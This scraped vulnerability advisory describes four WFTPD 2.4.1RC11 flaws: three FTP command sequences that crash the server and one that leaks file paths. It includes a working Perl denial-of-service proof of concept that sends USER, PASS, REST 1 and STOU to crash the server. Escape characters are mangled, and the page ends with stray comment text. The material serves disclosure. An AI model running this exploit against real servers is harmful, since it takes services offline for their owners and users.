source: http://www.securityfocus.com/bid/1506/info
WFTPD versions prior to 2.4.1RC11 suffer from a number of vulnerabilities.
1) Issuing a STAT command while a LIST is in progress will cause the ftp server to crash.
2) If the REST command is used to write past the end of a file or to a non-existant file (with STOU, STOR, or APPE), the ftp server will crash.
3) If a transfer is in progress and a STAT command is issued, the full path and filename on the server is revealed.
4) If an MLST command is sent without first logging in with USER and PASS, the ftp server will crash.
================================================================
BluePanda Vulnerability Announcement: WFTPD/WFTPD Pro 2.41 RC11
21/07/2000 (dd/mm/yyyy)
[email protected]
http://bluepanda.box.sk/
#!/usr/bin/perl
#
# WFTPD/WFTPD Pro 2.41 RC11 denial-of-service #2
# Blue Panda - [email protected]
# http://bluepanda.box.sk/
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
use IO::Socket;
$host = "ftp.host.com" ;
$port = "21";
$user = "anonymous";
$pass = "p@nda";
$wait = 10;
# Connect to server.
print "Connecting to $host:$port...";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.n";
print "done.n";
print $socket "USER $usernPASS $passnREST 1nSTOUn";
# Wait a while, just to make sure the commands have arrived.
print "Waiting...";
$time = 0;
while ($time < $wait) {
sleep(1);
print ".";
$time += 1;
}
# Finished.
close($socket);
print "nConnection closed. Finished.n"
![图片[1]-WFTPD 2.4.1RC11多个漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png)
CVE编号
![图片[2]-WFTPD 2.4.1RC11多个漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png)
CNNVD-ID
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666